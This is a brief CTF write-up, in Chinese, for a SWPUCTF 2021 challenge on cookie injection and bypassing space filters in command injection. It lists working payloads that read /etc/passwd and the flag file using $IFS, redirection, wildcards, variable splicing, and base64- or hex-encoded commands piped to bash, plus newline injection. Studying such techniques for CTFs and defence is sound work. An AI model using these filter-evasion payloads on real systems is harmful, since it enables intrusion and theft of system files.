SWPUCTF 2021 | cookie注入 | 空格绕过 |
题目
cookie注入
访问/rasalghui.php
空格绕过
1.$IFS 是是Bash中的内部字段分隔符,默认值为空格、制表符和换行符
2.${IFS}$1 也可以结合位置参数增加混淆性:
使用url编码
3.%09 是制表符的url编码
4.%20 是空格的url编码
使用重定向符号
利用 <、> 或 <> 替代空格,构造命令:
5.cat</etc/passwd
6.cat<>/etc/passwd
使用注释符号
在某些过滤规则中,/**/ 可以作为分隔符:
7.cat/**//etc/passwd
使用通配符
利用通配符 * 或 ? 模糊匹配文件路径:
8.cat /e??/p*
利用变量拼接
将命令拆分为变量,动态拼接:
9.a=c; b=a; c=t; $a$b$c /etc/passwd
编码绕过
将命令编码为Base64或十六进制,解码后执行:
10.echo 'Y2F0IC9ldGMvcGFzc3dk' | base64 -d | bash
11.echo "636174202f6574632f706173737764" | xxd -r -p | bash
特殊变量混淆
利用 \(*、\)@ 或 ${x} 等特殊变量进行混淆:
12.wh$1oami
13.ca${21}t /etc/passwd
插入换行符
通过换行符 %0a 替代空格:
14.127.0.0.1%0als
这里我使用了通配符/f* 去查询f开头的文件
也可以是
ls$IFS../../.././
然后cat$IFS../../../fllllllag
浙公网安备 33010602011771号